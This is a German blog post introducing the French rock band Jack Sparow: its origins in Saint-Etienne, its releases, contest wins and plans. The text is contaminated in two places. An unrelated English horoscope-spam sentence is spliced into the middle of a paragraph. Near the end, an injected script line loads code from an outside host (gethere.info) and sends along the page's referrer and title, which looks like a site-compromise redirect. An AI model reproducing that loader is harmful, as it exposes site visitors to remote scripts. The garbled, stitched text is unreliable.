Jack Sparow // Bands aus Frankreich (Teil 2)

Montag, November 3, 2008
Von mag

Jetzt ist es wieder so weit: Unsere Kollegen aus Frankreich stellen uns eine französische Band vor. Diesmal sind es Jack Sparow.
DSC_0845_s Anders als der Name es vermuten lässt, gründeten sich „Jack Sparow“ nicht auf einem Piratenschiff, sondern in Südfrankreich, in Saint-Etienne. Einige Zeit bestand die Band aus drei Freunden, 2005 gesellte sich noch ein Bassist dazu. Pop, Brit Pop oder Rock „n Roll ? Jeder fragt sich welchen musikalischen Stempel er ihnen aufdrücken soll. Dabei ist die Antwort nicht schwer: Sie machen die Musik, die sie lieben, ganz einfach Rockmusik.

Nachdem sie verschiedene Stilrichtungen und auch Bandnamen ausprobiert hatten, veröffentlichten „Jack Sparow“ 2006 ihr erstes Album «Le monde des merveilles» (Die Welt der Wunder). Schrieben sie zuvor noch viele Texte auf Englisch, so trauen sie sich, dieses Album komplett auf Französisch zu singen. Und dennoch ist es Jack Sparow mit dieser Platte gelungen, eine britische Note in ihren Sound einzubringen, wie man sie in der aktuellen französischen Rocklandschaft recht häufig findet. (Luke, Déportivo, Mickey 3D). Ein Jahr später erschien «L“echappé belle» (Die schöne Flucht), eine sehr kraftvolle 7-Track-EP. Das Glanzstück, das mittlerweile zu einem kleinen Hit avancierte, ist «Tu médites» (Du denkst nach) – ein Song voll geballter Energie. Was diesen Song so besonders macht, ist die Tatsache, dass die Band ihn musikalisch wie auch gesanglich ständig weiterentwickelt und ihn For a Sagittarius, April druid horoscope suggests to work on their health in this month, since it will be a really good time for that, as well. live immer wieder anders präsentiert.

Ohne die Hilfe eines Produzenten oder Bookers nahm die Band bereits an mehreren Sprungbrettwettbewerben teil, wie dem Scoop Live Contest oder dem Festival Rock N“Poche. Zwei davon (die RTL2 Pop Rock Tour 2006 in ihrer Geburtsstadt und den Nachwuchs – Contest von Rempart) konnten sie für sich entscheiden. Diese Auftritte verhalfen ihnen zu einiger Aufmerksamkeit und Anerkennung bei Radiosendern wie le Mouv“, Virgin radio oder auch Scoop.

Gerade kommen sie frisch aus dem Studio, wo sie ihre neue EP aufgenommen haben, und sind auf der Suche nach einem Booker, der sie in ihrem Elan unterstützt. Sie hoffen, dass diese Aufnahmen ihnen neue Türen öffnen, vielleicht ja auch die eines Labels. Einige Lieder sind inzwischen wieder auf Englisch, dennoch verzichten sie nicht darauf, sich auch auf Französisch auszudücken. Wenn sich der Song auf Englisch besser anhört, warum nicht, aber es muss eben auch nicht sein. Hört euch zum Beispiel die letzten beiden Stücke «Georges the best» und «Péter une pile» an und entscheidet selbst. Auf jeden Fall muss man sich keine Sorgen um sie machen. Sie haben das nötige Zeug, um den Durchbruch zu schaffen: einen sehr speziellen Stil, eine beeindruckende Bühnenshow und mit ihrem Sänger Ju ein wahres Energiebündel.
Jetzt ist es an euch, sie selbst anzuhören, ihr werdet nicht enttäuscht sein!

Offizielle Seite
Jack Sparow bei Myspace
Jack Sparow bei Facebook

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Comments are closed.